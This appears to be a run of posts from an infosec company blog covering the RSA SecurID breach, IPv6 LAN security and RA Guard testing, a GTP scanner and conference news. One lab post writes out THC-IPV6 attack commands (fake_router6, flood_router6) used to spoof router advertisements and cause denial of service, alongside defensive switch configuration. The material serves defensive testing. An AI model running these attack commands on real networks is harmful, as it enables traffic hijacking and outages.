Lots of stuff has been written about this blog post from RSA describing the (potential) details of the attack, so I will refrain from detailed comments on this piece that Marsh Ray nicely called “some of the most egregious hyperbole I’ve read in infosec”.
Just one short note. Presumably the attack, in an early stage, used a “spreadsheet [that] contained a zero-day exploit that installs a backdoor through an Adobe Flash vulnerability (CVE-2011-0609)”.
TROOPERS11 was a blast! We received great feedback from all attendees and speakers. This really pushes ourselves towards the next goals and an even better security conference in 2012.
We’re happy that everybody got home safely with new ideas and inspirations in mind. On a side note: The awesome TROOPERS badge caused trouble for some of you with the airport security 😉 I really hope everybody could find a way to take it back home. It will hopefully find its way to an adequate place right next to your old memorabilia (cup of the first won soccer match, your college degree or photos from your first ballet show). Regard it as the proof of your latest achievement and tell everybody proud and loud: WE ARE TROOPERS.
Best regards,
Florian
PS: Videos and photos are coming soon. Stay tuned.
Some of you may have heard of the break-in at RSA and may now be wondering “what does this mean to us?” and “what can be done?”. Not being an expert on RSA SecurID at all – I’ve been involved in some projects, however not on the technical implementation side but on the architecture or overall [risk] management side – I’ll still try to contribute to the debate 😉
Feel free to correct me either by comment or by personal email in case the following contains factual errors.
Fundamentals
My understanding of the way RSA SecurID tokens work is roughly this:
a) The authentication capabilities provided by the system (as part of an overall infrastructure where authentication plays a role) are based on two factors: a one-time-password (OTP) generated in regular intervals by both a token and some (backend) authentication server and a PIN known by a user.
c) the OTP generation process takes some initialization value called the “seed” and the current time as input and calculates – by means of some algorithm at whose core probably sits a hash function – the OTP itself.
d) the algorithm seems publicly known (there are some cryptanalytic papers listed in the Wikipedia article on RSA SecurID and a generator – needing the seed as input – has been available for some time now). Even if it wasn’t public we should assume that Kerckhoff’s principle exists for some reason 😉
e) So, in the end of the day, an OTP of a given token at a given point of time can be calculated once the seed of this specific token is known.
This means: to some (large) degree, the whole security of the OTP relies on the secrecy of the seed which, obviously, must be kept. [For the overall authentication process there’s still the PIN, but this one can be assumed to be the “weaker part” of the whole thing.]
Flavors
RSA SecurID tokens, and those of other vendors as well, are sold in two main variants:
– as hardware devices (in different sizes, colors etc.) Here the seed is encoded as part of the manufacturing process and there must be some import process of token serial numbers and their associated seeds into the authentication server (located at the organization using the product for authentication), and some subsequent mapping of a user + PIN to a certain token (identified by serial number, I assume). The seeds are then generated on the product vendor’s (e.g. RSA’s) side in an early stage of the manufacturing process and distributed as part of the product delivery process. Not sure why a vendor (like RSA) should keep those associations of (token) serial numbers and their seeds (as I said, I’m not an expert in this area so I might overlook sth here, even sth fairly obvious ;-)) once the product delivery process is completed, but I assume this nevertheless happens to some extent. And I assume this is part of the potential impact of the current incident, see below.
– as so-called “soft tokens”, that are software instances running on a PC or mobile device and generating the OTP. For this purpose, again the seed is needed and to the best of my knowledge there’s, in the RSA space at least, two ways how the seed gets onto the device:
generate it as part of “user creation” process on the authentication server and subsequent distribution to users (by email or download link), for import. For obvious reasons not all people like this, security-wise.
generate it, by means of an RSA proprietary scheme called Cryptographic Token Key Initialization Protocol (CT-KIP) in parallel on the token and the server and thereby avoid the (seed’s) transmission over the network.
Btw: In both cases importing the seed into a TPM would be nice, but – as of mid 2010 when I did some research – this was still in a quite immature state. So not sure if this currently is a viable option.
Attacks
For an attacker going after the seed I see three main vectors:
compromise of an organization’s authentication server. From audits in the past I know these systems often reside in network segments not-too-easily accessible and they are – sometimes – reasonably well protected (hardening etc.). Furthermore I have no idea how easy it would be to extract the seeds from such a system once compromised. Getting them might allow for subsequent attacks on remote users (logging into VPN gateways, OWA servers etc.), but only against this specific organization. And if the attacker already managed to compromise the organization’s authentication server this effort might not even be necessary anymore.
compromise of the (mobile) devices of some users of a given organization using soft tokens and copy/steal their seeds. This could potentially be done by a piece of malware (provided it manages to access the seed at all, which might be difficult – protected storage and stuff comes to mind – or not. I just don’t know 😉
This is the one usually infosec people opposing the replacement of hard tokens by soft tokens (e.g. for usability reasons) warn about. There are people who do not regard this as a very relevant risk, as it requires initial compromise of the device in question. Which, of course, can happen. But why “spend energy” on getting the seed then as the box is compromised anyway (and any data processed on it). I’m well aware of the “attacker can use seed for future attacks from other endpoints” argument. One might just wonder about the incentive for an attacker to got after the seeds…
It should be noted that binding the (soft) token to a specific device, identified by serial number, unique device identifier (like in the case of iPhones) or harddisk ID or sth – which can be done in the RSA SecurID space since some time, I believe since Authentication Manager 7.1 – might to some degree serve as a mitigating control against this type of attack.
attack vendor (RSA) and hope to get access to the seeds of many organizations which can then be used in subsequent targeted attacks. I have the vague impression that this is exactly what happened here. Art Coviello writes in his letter:
“[the information gained by the attackers] could potentially be used to reduce the effectiveness of a current two-factor authentication implementation as part of a broader attack.”
I interpret this as follows: “dear customers, face the fact that some attackers might dispose of your seeds and the OTPs calculated on those so you’re left with the PIN as the last resort for the security of the overall authentication process”.
I leave the conclusions to the valued reader (and, evidently, the estimation if my interpretation holds or not) and proceed with the next section.
Mitigating Controls & Steps
First, let’s have a quick look at the recommendations RSA gives (in this document). There we find stuff like “We recommend customers follow the rule of least privilege when assigning roles and responsibilities to security administrators.” – yes, thanks! RSA for reminding us, this is always a good idea 😉 – and equally conventional wisdom including pieces like “We recommend customers update their security products and the operating systems hosting them with the latest patches”. And, of course, it’s pure coincidence that they mention the use of SIEM systems twice… being a SIEM vendor themselves ;-))
From my part I’d like to add:
– in case you use RSA SecurID soft tokens, binding individual tokens to specific devices seems a good idea to me. (yes, this might mean that users using several devices have several, different, instances then. and, yes, I understand that in the shiny new age of user-owned funky smartphone gagdets used for corporate information processing, this might be a heavy burden to ask your users for 😉
– some of you might re-think their (sceptical) position as for hard tokens: in the RSA SecurID space soft tokens can be “seeded” by means of CT-KIP, so no 3rd party is involved or disposes of the seeds. I’m not aware of such a feature for hard tokens.
– whatever you do, think about the supply chain of security components, which parties are involved and which knowledge they might accumulate.
– replacing proprietary stuff by standard based approaches (like X.509 certificates) should always be reconsidered.
– whatever you do, authentication-wise, you should always have a plan for revocation and credential replacement. This should be one of the overall lessons learned from this incident and the current trend that well-organized attackers will go after authentication providers and infrastructures (see, for example, this presentation from the recent NSA Information Assurance Symposium).
Last but not least I’d like to draw your attention to this upcoming presentation on the current state of authentication at Troopers. I’d be surprised if Steve and Marsh would not include the RSA incident in their talk 😉
Reading this advisory I’m quite tempted to emit another rant on the relationship of heavy use of 3rd party components, lack of (security) quality assurance and services running at times where they’re not needed (see second workaround here). I’ll refrain from that for today. Just wanted to let you know that the underlying vulnerability in Struts2 was initially discovered by Meder Kydyraliev who gives this talk at Troopers in two weeks. He’ll certainly describe the inner workings of this one, and others… 😉
Just a short addition to the previous posts ([1], [2]) on IPv6 security today. In the last two days I had the opportunity to sharpen my understanding of some aspects of IPv6 behavior in (Windows-) LANs. Actually I gave an IPv6 workshop for some members of the “Project Services” team of Hamburg-based computer & competence IT-solutions provider [btw: thanks to Mr. Wendler of CuC for organizing it, and thanks to Mr. Cassel for the breakfast…].
Those guys were amazingly adept with Wireshark (I got a ‒ long-needed ‒ refresher on display filters ;-)) and networking technologies in general so it was a workshop in the purest sense: lots of practical hands-on, lots of tinkering, lots of enligthening discussions.
I pretty much like every part of my work (I mean, from my humble perspectice infosec is the most exciting discipline anyway, isn’t it ;-)) but workshops like this one are sth I particularly enjoy. Huge personal progression and getting paid for it 😉
Ok, enough enthusiasm… let’s get back to earth. Based on the stuff we did I’d like to raise two points.
a) I found out that the latest MS Windows versions all seem to dispose of a parameter allowing to disable the processing of router advertisements at all. Being an old-fashioned networking guy I’m not sure if I like this (given it seems a violation of core IPv6 architecture fundamentals), still ‒ wearing the hat of a network security practitioner ‒ I recognize there are certainly use cases where this comes in handy, e.g. DMZ segments with a mostly (and deliberately so) static configuration approach.
The parameter can be set on an interface level by
netshint ipv6 set int [index] routerdiscovery=disabled
Checking the actual state of it can be done by
When set the box (interface) in question will not process router advertisements anymore which might provide some protection against RA based attacks (notably the spoofed RA attack described in this post). The configuration of the basic IP parameters must then either be done manually or by means of DHCPv6. It should be noted that DHCPv6 currently does not provide an option to distribute a default route/gateway (this IETF draft on Default Router and Prefix Advertisement Options for DHCPv6 was seemingly discontinued, see also the extensive discussion in RFC 6104) so in case of a DHCPv6 based (stateful) configuration approach the respective systems won’t have a default route (which, again, might be helpful for their security, in certain scenarios).
Obviously, once you use this one for hardening purposes, you should closely keep track of the affected systems. Else troubleshooting might became a nightmare …
b) I had a closer look at the router advertisements generated by fake_router6 from the THC-IPV6 attack suite. Those are generated with a “High” (value: 01) router preference. So going with a high router preference on one’s own might just provide equal terms. Of course we still recommend to use this approach (discussed in this post, and in RFC 6104) to protect from “mislead entities emitting router advertisements on the local link”.
this post is the sequel of this one on the IPv6 security feature called “RA guard”. As announced in that post I recently got a 4948 on ebay. After installing the appropriate image and noticing that RA guard was still unavailable I found out it should have been a 4948E which is capable of “doing IPv6 in hardware” (as opposed to the “simple 4948” only supporting IPv6 in a “software switched” way. and pls note there’s also the informal term 4948-E denoting a 4948 running an “enhanced image”).
Well… we’ll certainly find some useful function for that device – and I just initiated the acquisition of a 4948E – but I was just eager to get my hands on the practical use and implications of RA guard. Looking at the Cisco Feature Navigator for “IPv6 Basic RA Guard” it seems that it’s still the same platforms supporting it as eight weeks ago, so there was only one option left: get one of our Cat 65Ks from the basement and perform the testing with it.
Given ERNW’s strong emphasis on sports pretty much immediately some kind-of “strong man contest” evolved going like “who can lift and carry the device without further assistance”
so we had quite some fun just putting the box into operation.
[for those interested we can provide the number and nature of modules installed at the time of that contest ;-)]
Ok, back to the technical side of things. Here’s what we did:
Step 1) Perform RA based attacks with “RA Guard” being absent.
For that purpose we used Van Hauser’s THC-IPV6 attack suite (which can be found here) and performed two specific attacks.
1a) Use
fake_router6 eth0 2001:db8:dead:beef::/64
to send spoofed RAs which resulted in an additional prefix and associated default gateway being learned on the victim system (default install of current MS Windows).
It should be noted that the additional (“spoofed”) default gateway had a better (= lower) metric in the routing table.
1b) Use
flood_router6 eth0
to send arbitrary spoofed router advertisements (with the eventual purpose of a DoS condition). This worked equally well. Right after starting the attack the CPU load of the attacked system ‒ and for that matter, the load of other systems on the local link as well ‒ went to 100% (and stayed there for hours after stopping the emanation of packets on the attacker’s host).
[you might notice that this is not the “oldest and weakest laptop we took from our lab shelf”…]
In short: both RA based attacks we tried worked like a charm.
So this is absolutely something every security responsible of a IPv6 enabled network should be concerned about…
Step2: put lab device into action, enable RA guard and check if it helps.
[which, btw, “silently ignores” any WS-X6248-RJ-45 modules present in the box. Of course, I’m aware that all of you valued readers always carefully read the release notes of this (or other) images before deploying them…]
We then enabled RA guard on the access-ports to-be by
Router(config)#int range f1/24 – 36
Router(config-if-range)#switchport
Router(config-if-range)#switchport mode access
Router(config-if-range)#ipv6 nd raguard
and performed the attacks again.
Without success! Seemingly the box efficiently (and silently) discarded all RA packets arriving on those ports.
So we can certainly state that RA guard fully performs as expected. One minor annoyance we noticed: there seems no log message of any kind while the attack is in progress.
However, earlier – when performing step 1a – we had noticed sth like this on the router legitimately serving the local network with RAs:
Thus there might still be a way to detect RA based attacks. It’s just not on the box providing protection from them but on another one.
If you want to see these attacks (and the – quite simple – configuration of RA guard) in practice you can do so either at our workshop on “IPv6 security in LANs” at Troopers or at the Heise IPv6 Kongress in May. At both occasions we’ll demonstrate this stuff.
We think that RA guard is pretty much the only way to protect against RA based attacks in an operationally feasible way (as opposed to, say, filtering ICMP type 134 by means of port based or VLAN ACLs).
To mitigate the risk of “RA interference” caused by potentially misconfigured systems (e.g. Windows systems running 6-to-4 with a public IPv4 address and Internet Connection Sharing enabled; more on this in a future post on IPv6 tunnel technologies) or by systems “accidentally inserted into the local network” (employee connecting SOHO DSL router. which, again, certainly never happens in your network…), there might be another configuration tweak that could help. The standards track RFC 4191 on Default Router Preferences and More-Specific Routes introduced the concept of a preference assigned to router advertisements distributed by routers on the local link.
For that purpose the format of RA messages is extended and two of the previously unused bits within the byte containing the flags are used for a “Prf” (Default Router Preference) value.
The configuration is quite simple (on Cisco routers where the feature was introduced in IOS Version 12.4(2)T) and goes like this:
Router(config)# interface f0/1
Router(config-if)# ipv6 nd router-preference {high | medium | low}
Hosts receiving RAs tagged with a high preference flag will prefer them over RA messages emitted with the default value (“medium”). We’ll play around with this in a more detailed fashion at some occasion and keep you posted. In the interim you might look here to get some background on the way router preference works.
The next post of our series is planned to cover the (in the current Windows world) ever-present tunnel technologies and their security implications.
gtp_scan is a small python script that scans for GTP (GPRS tunneling protocol) speaking hosts. To discover those hosts it uses the GTP build in PING mechanism, it sends a GTP packet of the type ECHO_REQUEST and listens for an incoming GTP ECHO_REPLY. Its capable of generating ECHO_REQUESTS for GTP version 1 and GTP version 2. Also the script can scan for both, GTP-C and GTP-U (the control channel and the user data channel), only the port differs here.
In the output the received packet is displayed and the basic GTP header is dissected so one can see a GTP version 1 host answering a GTP version 2 ECHO_REQUEST with the ‘version not supported’ message.
Tests have shown that there are some strange services around, which answer to an GTP ECHO_REQUEST with a lot of weird data, which leads to ‘kind of’ false positive results but they can easily be discovered by checking the output data with your brain 😉 (eg. there is no GTP version 12)
just a short, somewhat non-technical, post today: I really like this response Ross Anderson gave to the “UK Cards Association” asking Cambridge University for taking offline a thesis of one of their students. It (the letter) pretty much summarizes how security research should be treated and backed by those interested in a more secure world we live in.
On a personal note I’d like to add that Ross’ main volume “Security Engineering: A Guide to Building Dependable Distributed Systems”, initially published in 2001 and updated in the interim with a second edition in 2008, has been the most influential security book for me on my long way in the infosec space (which started back in 1997, with some workshops on firewalls I gave for IT auditors). If I could take only one infosec book to a lonely island, it would be this one.
[not sure which one to take if I could only take one book at all 😉 … maybe Thomas Mann’s “Doktor Faustus”… will get back to this once I’ve figured an answer ;-)]
Back in a few days with the next part on IPv6, have a good one everybody
at first a happy new year to our loyal readers (and, of course, to everybody else too ;-)! We hope you all had some pleasant transition times, not suffering from bad hangovers after 27C3 or sth 😉
Things are heating up for Troopers and in the course of that we started putting together the slides for the workshops (I’m delighted that Flo told me today there’s already quite a number of bookings for the workshops…). I myself will give the “IPv6 Security in LANs” workshop, together with Christopher. The workshop preparation will be accompanied by a series of blogposts with three main areas to be covered:
– IPv6 behavior in the LAN, its underlying trust model and subsequent attacks (all the attacks centered around ND, RA etc.).
– tunnel technologies and their inherent risks.
– risks associated with IPv6 addressing (reachability of internal systems due to route leakage, problems related with privacy extensions etc.).
Pls note that we assume that the reader already disposes of some knowledge of IPv6 inner workings so we’re not going to cover protocol basics here.
[at some point we might provide a list of books we regard valuable for the topic though]
To get some inspiration and an update on current attacks I just watched the youtube video of Marc Heuse’s (aka Van Hauser from THC) talk at 27C3 on “Recent advances in IPv6 insecurities”. Impressing stuff! I’d say: a must see for everybody involved in IPv6 security.
The Q+A session will serve as a starting point to today’s post.
The second question (at about 44:55 in the youtube video) comes from a guy asking for “mitigation techniques”. Marc’s answer is “vendor updates”.
While this is certainly correct to some degree I’d like to add that there are – depending on the network infrastructure deployed – fairly simple ways to mitigate all the nasty “spoofed RA”, “RA flooding” etc. stuff.
To illustrate those let’s take ERNW’s “Seven Sisters of Network Security” approach which describes fundamental guidelines for infrastructure security that can be applied regardless of the technology/-ies in question (or even regardless of the network context. They work for any kind of complex system, be it a network, a building, a production plant etc.).
a) Sister no. 1: “Access Control” (keep the threat out of the overall system). Obviously keeping an attacker who tries to perform all those awful IPv6 based things out of your network at all (e.g. by using 802.1x) would be elegant and nice. Still let’s assume for the moment that the approach of access control is, for whatever reason, not available.
b) Sister no. 2: “Isolation” (limit the assets’ visibility/reachability with regard to the threat).
The isolation principle can be applied in two ways. First it should be obvious that, given the link-local nature of RAs, most of RA/ND related attacks can only be performed on the local link (“IP subnet” in IPv4 lingo) so putting systems-to-be-protected in different segments than those where attacks can be expected (e.g. due to type of users or systems located in them) would be a first step. So, once more, proper network segmentation can be your friend. This can’t be stated often enough! Unfortunately this isolation approach isn’t present in many environments and can’t be implemented easily either.
Second – and this (finally ;-)) is the main point of this post – on an abstract level router advertisments are kind-of sensitive traffic that should not originate from “the untrusted access domain” but only from “trusted infrastructure devices”. So preventing “the access domain” from injecting RAs and limiting RA originators to some trusted entities (e.g. identified by the network ports they’re connected to) would be “the architectural approach”. Which is exactly what the “Router Advertisment [RA] Guard” feature does.
RA Guard, currently described (note that I’m not writing “specified”) in this IETF draft (after all available as a “08 version” which means there’s some momentum in the process) works quite similarly to other Layer 2 protection mechanisms (for example “DHCP snooping”) available on many access switches nowadays: “do not accept a certain type of [infrastructure protocol] packets on certain ports”. In our context this would mean “do not accept RAs on all ports except those where the trusted L3 devices are connected”. Usually this type of protection mechanisms requires (only!) one extra line of config added to your “secured port configuration templates” – that all of you use, don’t you? 😉 – which in the case of Cisco devices would be “ipv6 nd raguard” (see this doc for more details).
Unfortunately, in the Cisco space (haven’t checked other vendors so far) RA guard seems currently only available on recent images for either Cat65K with Sup 720/Sup-32 and 4500/4900 series devices. We have a Cat65 with Sup-32 in our lab but I certainly don’t want to use this for the workshop (hint: being in the same room as a running Cat65 and trying to understand what the instructor tells you might instantly become tedious, for you… or the instructor ;-)).
So, for today, I can only state that based on my “paper understanding” of the way RA guard works, this will certainly be a good (means: operationally feasible) way of addressing a number of problems related with IPv6’s trust model in LANs. I just bought a 4948 on ebay and will start playing around with the feature once it arrives and share my thoughts on it here. I’m sure that RA guard will creep into other images soon as well so I’d surprised if it wouldn’t be present on, say, 3750s in the near future.
c) For completeness’ sake it should be noted that going with sister no. 3 “Restriction” (restrict/filter traffic between threat and asset) would be another option.
Filtering ICMP message 134 by port based or VLAN ACLs _could_ be another potential mitigation approach. Albeit one with much more operational cost than going with RA guard. So, if available, pls use RA guard and not the filtering approach. And pls don’t use both (at least not on the same devices). Why? See this post…
d) Again, for completeness’ sake I’d like to add that sister no. 4 “Use of Cryptography” could come into play as well, by using SEND (SEcure Neighbor Discovery as of RFC 3971). Personally I do not expect many environments to use SEND at all due to the large crypto and subsequent operational overhead.
Remember: the initial architecture of IPv6 was developed in the 90s where the naive thinking of “LANs are trusted and crypto can solve all problems if there are any” was still prevalent and (practically) nobody considered operational effort as a main driver (or “inhibitor”).
Will keep you updated once the 4948 “shows up” and I can perform some practical testing.
The British Standards Institution recently published “Cloud Computing. A Practical Introduction to the Legal Issues”. I ordered an electronic copy yesterday (I did that here, for GBP 30) and after a first glance can say there’s lots of valuable information in it.
Merry christmas to everybody, have some peaceful and relaxing days